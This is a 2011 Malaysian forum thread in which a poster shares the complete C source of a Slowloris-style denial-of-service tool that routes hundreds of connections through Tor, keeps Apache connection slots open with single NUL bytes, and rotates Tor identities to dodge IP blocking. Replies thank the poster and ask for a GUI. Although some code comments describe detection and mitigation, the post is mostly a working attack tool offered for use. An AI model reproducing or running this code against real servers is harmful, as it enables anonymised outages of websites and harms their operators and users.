Malaysian WackWall Forum

Now Malaysian Can Connect Over The World
 
 Slowloris or XerXes Leak Version

wackwall

PostSubject: Slowloris or XerXes Leak Version   Wed Jul 13, 2011 9:02 am

Share It!!


Code:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

/* =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 *                  Slowloris with a twist over tor
 * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 *
 * Due to the alpha version of this code being leaked I've decided
 * to release an improved version to fully show this method of
 * attack mostly free of the bugs / dependency on torsocks. This
 * attack works on a similar idea of slowloris only it sends packets
 * containing a single 0x00 and optionally nothing causing Apache
 * to keep the connection alive almost indefinitely.
 *
 * Due to no one knowing how th3j35t3r's XerXes works I can not say
 * if this is the same method. This was one of my many ideas I was
 * exploring as to how it could possibly work that has some successful
 * results.
 *
 * - SanguineRose / William Welna
 *
 *                        Leaked Version
 *        http://seclists.org/fulldisclosure/2011/Jul/84
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <pthread.h>

/* Re-connecting to tor sometimes takes a while, in order for this to be effective it requires
 * mass amounts of threads handling only a few connections each, since this is a POC I will leave
 * it up to others to fix that. It also has limited success/attack lengths due to tor being slow
 */
#define CONNECTIONS 3
#define THREADS 148

/* Arguments handed to every worker thread: the target host name and port,
 * both kept as strings. main() points them at argv[1] and argv[2] and passes
 * the same struct to all threads, which only read it. */
typedef struct {
    const char *host, *port;
} thread_args;

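/*
 * Debug helper: writes `size` bytes of `data` to stderr in hexadecimal, one
 * value per line, wrapped as "name { ... };".
 *
 * name  label printed before the opening brace; a NULL label is printed as
 *       "(null)" instead of being passed to strlen().
 * data  bytes to dump; NULL prints an empty body.
 * size  number of bytes to print; values <= 0 print an empty body.
 *
 * The only caller in this file is commented out.
 */
void dump_array(char *name, char *data, int size) {
    const char *label = (name != NULL) ? name : "(null)";
    int indent = (int)strlen(label) + 2;

    fprintf(stderr, "%s { ", label);
    if (data != NULL) {
        for (int i = 0; i < size; i++) {
            for (int pad = 0; pad < indent; pad++)
                putc(0x20, stderr);
            /* Convert through unsigned char first: where plain char is signed,
             * a byte >= 0x80 would otherwise be sign-extended and printed as
             * ffffffXX, and %x expects an unsigned int argument. */
            fprintf(stderr, "%20x\n", (unsigned int)(unsigned char)data[i]);
        }
    }
    fprintf(stderr, "};\n");
}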

/* Resolves host:port and returns a connected TCP socket.
 *
 * getaddrinfo() is asked for stream sockets of any address family, and the
 * returned addresses are tried in order until one connect() succeeds.
 *
 * Returns the connected descriptor, -1 if name resolution fails (the
 * gai_strerror() text is printed to stderr), or -2 if no address accepted
 * the connection. The address list is freed on both of the later paths.
 */
int make_socket(const char *host, const char *port) {
    struct addrinfo hints, *servinfo, *p;
    int sock, r, y=1;
    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
        fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
        return -1;
    }
    for(p = servinfo; p != NULL; p = p->ai_next) {
        if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
            continue;
        }
        // Option length is hard-coded as 4; the setsockopt() result is not checked.
        setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &y, 4);
        if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
            close(sock);
            continue;
        }
        break;
    }
    // p is NULL only when the loop ran off the end without a successful connect().
    if(p == NULL) {
        if(servinfo)
            freeaddrinfo(servinfo);
        return -2;
    }
    if(servinfo)
        freeaddrinfo(servinfo);
    return sock;
}

/* Opens SOCKS5 connection to tor
 * I also dedicate this function to pr0f <3
 *
 * Connects to a SOCKS5 proxy on 127.0.0.1:9050 and asks it to open a TCP
 * connection to host:port. The request uses address type 0x03 (domain name),
 * so the host name is sent to the proxy as text rather than resolved here.
 *
 * Returns the proxy socket on success, the negative value from make_socket()
 * if the proxy is unreachable, -3 if the method negotiation reply is not
 * "version 5, no authentication", or -4 if the connect reply is not success.
 *
 * Defender's note: the target sees the address of a Tor exit relay, not of
 * the machine running this code, so source-address attribution and per-IP
 * rate limits say little about the operator.
 *
 * NOTE(review): the results of calloc(), read() and write() are not checked,
 * and the host length is not bounded against the one-byte SOCKS5 length
 * field or the 1024-byte buffer.
 */
int pr0f_loves_me_tor_connect(const char *host, const char *port) {
    char *buf = calloc(1024, sizeof(char));
    short l = strlen(host), t;
    int x, sock;
    fprintf(stderr, "[Connect %s:%s]\n", host, port);
    if((sock=make_socket("127.0.0.1", "9050"))<0) {
        free(buf);
        return sock;
    }
    write(sock, "\x05\x01\x00", 3); // SOCKS5, 1 Authentication Method, No Auth/Plain
    read(sock, buf, 1024);
    // Expect version 0x05 and selected method 0x00 (no authentication).
    if((buf[0] != 0x05) || (buf[1] == 0xFF) || (buf[1] != 0x00)) {
        free(buf);
        return -3; // Auth not accepted by socks server / wrong version
    }
    // Request header: version 5, command 1 (CONNECT), reserved 0, address type 3
    // (domain name), then the name length, the name bytes and the port.
    buf[0] = 0x05; buf[1] = 0x01; buf[2] = 0x00; buf[3] = 0x03; buf[4] = l;
    for(x=0; x < l; x++)
        buf[5+x] = host[x];
    x=l+5;
    t = htons(atoi(port)); // port in network byte order
    memcpy((buf+x), &t, 2);
    //dump_array("final_request", buf, x+2);
    write(sock, buf, x+2);// send request
    read(sock, buf, 1024);
    if((buf[0] == 0x05) && (buf[1] == 0x00)) { // connection granted/success
        free(buf);
        return sock;
    }
    free(buf);
    return -4; // Unable to conect
}

// This is for the SIGPIPE error on bad connections / premature closing.
// attack() installs it with signal(SIGPIPE, ...), so the signal is handled
// here (by doing nothing) and the failed write() is dealt with by its
// return-value check instead.
void broke(int s) {
    // do nothing
}

/* Worker thread body. `arg` is a thread_args giving the target host and port.
 *
 * Keeps CONNECTIONS proxied sockets per thread. Every 100 ms it writes a
 * single 0x00 byte on each of them; a slot whose value is <= 0 is (re)opened
 * first, and a slot whose write fails is closed and reopened. The loop has no
 * exit, so the function never returns.
 *
 * What the target sees: many connections that stay open and deliver a slow
 * trickle of NUL bytes but never a complete HTTP request, each one holding a
 * connection slot. The file header describes this as keeping Apache
 * connections alive almost indefinitely.
 *
 * Detection and mitigation: look for connections with a long lifetime, very
 * few bytes received and no parsed request line. Enforce a request-header
 * read timeout with a minimum data rate (Apache's mod_reqtimeout and its
 * RequestReadTimeout directive exist for this), cap concurrent connections,
 * and/or put an event-driven reverse proxy in front of worker-per-connection
 * servers so idle connections do not consume workers.
 */
void *attack(void *arg) {
    thread_args *a = (thread_args *)arg;
    int x, r, socks[CONNECTIONS];
    fprintf(stderr, "[Thread Started]\n");
    // 0 marks a slot as "not connected yet" for the <= 0 test below.
    for(x=0; x < CONNECTIONS; x++)
        socks[x]=0;
    signal(SIGPIPE, &broke);
    while(1) {
        for(x=0; x < CONNECTIONS; x++) {
            if(socks[x] <= 0) {
                socks[x] = pr0f_loves_me_tor_connect(a->host, a->port);
                fprintf(stderr, "[Socket Returned %i]\n", socks[x]);
            }
            // One NUL byte per connection per pass.
            if(write(socks[x], "\0", 1) < 0) {
                close(socks[x]);
                fprintf(stderr, "[Socket Error Returned %i]\n", socks[x]);
                socks[x] = pr0f_loves_me_tor_connect(a->host, a->port);
            }
        }
        usleep(100000); // 100 ms between passes
    }
}

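/* Prints the command-line usage line to stderr and exits with status 0.
 *
 * n  program name to show in the usage line (main() passes argv[0]); a NULL
 *    name is shown as "program".
 *
 * The original call supplied no argument for the %s conversion, which is
 * undefined behaviour; the name is now passed explicitly.
 */
void do_help(char *n) {
    fprintf(stderr, "Usage: %s <ip/hostname> <port>\n", (n != NULL) ? n : "program");
    exit(0);
}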

/* Background thread body that talks to localhost:9051, which the error
 * message below identifies as the Tor control port.
 *
 * After one AUTHENTICATE command (no credential is supplied) it sends
 * "signal NEWNYM" every 5 seconds and reads the reply into a scratch buffer
 * that is never inspected. NEWNYM asks Tor to use fresh circuits for new
 * connections. The loop has no exit; the thread ends early only if the
 * control port cannot be reached.
 *
 * Defender's note: the apparent source addresses change while the traffic
 * continues, so blocking individual addresses has limited effect; timeouts
 * and connection limits enforced on the server do not depend on the source.
 * On the Tor side, presumably this only works where the control port accepts
 * unauthenticated commands, so the control port should require cookie or
 * password authentication.
 */
void *cycle_identity() {
    int sock = make_socket("localhost", "9051");
    char *shit_bucket = calloc(1024, sizeof(char));
    if(sock < 0) {
        fprintf(stderr, "Can't connect to tor control port\n");
        free(shit_bucket);
        pthread_exit(NULL);
    }
    // The two adjacent string literals are concatenated by the compiler.
    write(sock, "AUTHENTICATE ""\n", 16);
    while(1) {
        write(sock, "signal NEWNYM\n", 15);
        fprintf(stderr, "[cycle_identity -> signal NEWNYM\n");
        read(sock, shit_bucket, 1024); // reply is read and discarded
        sleep(5);
    }
}

/* Entry point: expects exactly two arguments, <ip/hostname> and <port>;
 * otherwise do_help() prints the usage line and exits.
 *
 * Starts the cycle_identity() thread, then THREADS attack() threads 200 ms
 * apart, all sharing the same thread_args. With the values defined above
 * that is 148 threads of 3 connections each, i.e. up to 444 concurrent
 * connections towards the target, which is the figure to compare against a
 * server's worker or connection limit.
 *
 * attack() never returns, so the joins below block for the life of the
 * process and the statements after them are not expected to run.
 */
int main(int argc, char **argv) {
    pthread_t threads[THREADS];
    pthread_t cycle_tid;
    thread_args arg;
    void *status;
    int x;
    if(argc != 3)
        do_help(argv[0]);
    arg.host = (const char *)argv[1];
    arg.port = (const char *)argv[2];
    // pthread_create() results are not checked here or in the loop below.
    pthread_create(&cycle_tid, NULL, cycle_identity, NULL);
    for(x=0; x < THREADS; x++) {
        pthread_create(&threads[x], NULL, attack, &arg);
        usleep(200000); // 200 ms between thread starts
    }
    for(x=0; x < THREADS; x++)
        pthread_join(threads[x], &status);
    pthread_kill(cycle_tid, 15); // 15 is SIGTERM on Linux
    pthread_exit(NULL);
    return 0;
}
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iF4EAREIAAYFAk4XxcIACgkQdBwqj+jihCUAeAD7BO07gG+GnEZWGcX9fn2takPy
zVSMo0KkwJBubUQtQwoA/1/ig9fN/adDhpOg1yPJmJrYCORcQhxbhxW1trWXQpEd
=yC0j
-----END PGP SIGNATURE-----

Finally It's Been Released!!
sucide_bomber

PostSubject: Re: Slowloris or XerXes Leak Version   Tue Jul 19, 2011 2:54 pm

cheers r0X...NICE SHARE MASTER....huhuhu tapi aku tak tau apa kegunaan benda ni.... afro
sucide_bomber

PostSubject: Re: Slowloris or XerXes Leak Version   Tue Sep 13, 2011 7:45 pm

bro...buat gui boleh ke...